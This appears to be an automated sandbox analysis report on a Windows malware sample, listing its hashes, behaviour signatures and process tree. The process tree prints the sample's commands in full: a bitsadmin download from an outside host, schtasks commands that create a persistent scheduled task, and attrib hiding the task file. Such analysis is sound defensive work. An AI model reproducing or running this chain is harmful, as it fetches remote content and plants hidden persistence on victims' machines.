Analysis
-
max time kernel
45s -
max time network
49s -
platform
windows7_x64 -
resource
win7-20220715-en -
resource tags
arch:x64arch:x86image:win7-20220715-enlocale:en-usos:windows7-x64system -
submitted
31-07-2022 05:35
Static task
static1
Behavioral task
behavioral1
Sample
f6cfc83f98db1f4d5750dc8be7ed539db2ed84dba811e88f4e1b20017c6ac109.exe
Resource
win7-20220715-en
Behavioral task
behavioral2
Sample
f6cfc83f98db1f4d5750dc8be7ed539db2ed84dba811e88f4e1b20017c6ac109.exe
Resource
win10v2004-20220721-en
General
-
Target
f6cfc83f98db1f4d5750dc8be7ed539db2ed84dba811e88f4e1b20017c6ac109.exe
-
Size
102KB
-
MD5
741d79de62c0d6a30f1e84b1eb6604ee
-
SHA1
3383f9a71e614a65a151d0392a87e3dd379bf579
-
SHA256
f6cfc83f98db1f4d5750dc8be7ed539db2ed84dba811e88f4e1b20017c6ac109
-
SHA512
8156eb0a3e8856efadce37f982408189f69126298dd5564b05d1ca6872add84490e4581e696f320a9ed1dadbd37f56429604d5efa401320829b1ed730943297c
Malware Config
Signatures
-
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Download via BitsAdmin 1 TTPs 1 IoCs
-
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exepid process 528 ipconfig.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious use of WriteProcessMemory 32 IoCs
Processes:
f6cfc83f98db1f4d5750dc8be7ed539db2ed84dba811e88f4e1b20017c6ac109.execmd.exedescription pid process target process PID 1972 wrote to memory of 964 1972 f6cfc83f98db1f4d5750dc8be7ed539db2ed84dba811e88f4e1b20017c6ac109.exe cmd.exe PID 1972 wrote to memory of 964 1972 f6cfc83f98db1f4d5750dc8be7ed539db2ed84dba811e88f4e1b20017c6ac109.exe cmd.exe PID 1972 wrote to memory of 964 1972 f6cfc83f98db1f4d5750dc8be7ed539db2ed84dba811e88f4e1b20017c6ac109.exe cmd.exe PID 1972 wrote to memory of 964 1972 f6cfc83f98db1f4d5750dc8be7ed539db2ed84dba811e88f4e1b20017c6ac109.exe cmd.exe PID 964 wrote to memory of 528 964 cmd.exe ipconfig.exe PID 964 wrote to memory of 528 964 cmd.exe ipconfig.exe PID 964 wrote to memory of 528 964 cmd.exe ipconfig.exe PID 964 wrote to memory of 528 964 cmd.exe ipconfig.exe PID 964 wrote to memory of 1508 964 cmd.exe cmd.exe PID 964 wrote to memory of 1508 964 cmd.exe cmd.exe PID 964 wrote to memory of 1508 964 cmd.exe cmd.exe PID 964 wrote to memory of 1508 964 cmd.exe cmd.exe PID 964 wrote to memory of 1580 964 cmd.exe PING.EXE PID 964 wrote to memory of 1580 964 cmd.exe PING.EXE PID 964 wrote to memory of 1580 964 cmd.exe PING.EXE PID 964 wrote to memory of 1580 964 cmd.exe PING.EXE PID 964 wrote to memory of 1836 964 cmd.exe bitsadmin.exe PID 964 wrote to memory of 1836 964 cmd.exe bitsadmin.exe PID 964 wrote to memory of 1836 964 cmd.exe bitsadmin.exe PID 964 wrote to memory of 1836 964 cmd.exe bitsadmin.exe PID 964 wrote to memory of 1600 964 cmd.exe schtasks.exe PID 964 wrote to memory of 1600 964 cmd.exe schtasks.exe PID 964 wrote to memory of 1600 964 cmd.exe schtasks.exe PID 964 wrote to memory of 1600 964 cmd.exe schtasks.exe PID 964 wrote to memory of 1644 964 cmd.exe schtasks.exe PID 964 wrote to memory of 1644 964 cmd.exe schtasks.exe PID 964 wrote to memory of 1644 964 cmd.exe schtasks.exe PID 964 wrote to memory of 1644 964 cmd.exe schtasks.exe PID 964 wrote to memory of 1564 964 cmd.exe attrib.exe PID 964 wrote to memory of 1564 964 cmd.exe attrib.exe PID 964 wrote to memory of 1564 964 cmd.exe attrib.exe PID 964 wrote to memory of 1564 964 cmd.exe attrib.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\f6cfc83f98db1f4d5750dc8be7ed539db2ed84dba811e88f4e1b20017c6ac109.exe"C:\Users\Admin\AppData\Local\Temp\f6cfc83f98db1f4d5750dc8be7ed539db2ed84dba811e88f4e1b20017c6ac109.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1972 -
C:\Windows\SysWOW64\cmd.execmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4Q0EH70O.cmd" "C:\Users\Admin\AppData\Local\Temp\f6cfc83f98db1f4d5750dc8be7ed539db2ed84dba811e88f4e1b20017c6ac109.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:964 -
C:\Windows\SysWOW64\ipconfig.exeipconfig /all3⤵
- Gathers network information
PID:528
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c type infile.txt3⤵PID:1508
-
-
C:\Windows\SysWOW64\PING.EXEping -a 8.8.8.8 -n 1 -43⤵
- Runs ping.exe
PID:1580
-
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin.exe /transfer "SyncScriptXML" /download /priority FOREGROUND http://onlineservices.fawmatt.com.au/AppStore/ALL-Domainless/syncscript.xml C:\Windows\Temp\syncscript.xml3⤵
- Download via BitsAdmin
PID:1836
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Delete /TN "SyncScript" /F3⤵PID:1600
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /TN "SyncScript" /XML C:\Windows\Temp\SyncScript.xml3⤵
- Creates scheduled task(s)
PID:1644
-
-
C:\Windows\SysWOW64\attrib.exeattrib C:\Windows\System32\Tasks\SyncScript +s +h3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1564
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
MD54901c736143f06b956c7d4268609ba67
SHA15e2c086ac18b82d5a5d5474a5bd26e31d733eb17
SHA256555f20bb938c7e90e1cbf0eb173aae217d06aae2fbb96b2bfefc4684439f0851
SHA512c43f67f9b528d9e76527063d78af3e38fb108a7352aa5b4658a6a25e0f77b208494b17b269681df95c3754d16ed5ca8e644f10b958d86acd520d88d742ccf997
-
Filesize
1KB
MD58a0843fb162a5dae6c75715e5b2d2106
SHA174365e4e603f18e717b5c5d27223d5f628a87e03
SHA256396f70283592615c189c48c75ccf65b9d4a894271b71bc087a575b674a9bcb34
SHA512089584a1d4bf8e5a52a39237ed7b48bc624bbeb7b1c07cfb3fb165d06494502ff18eed4d327255957b699f9be10afc70bf1105938efb7f1e025bb7ddf93232cd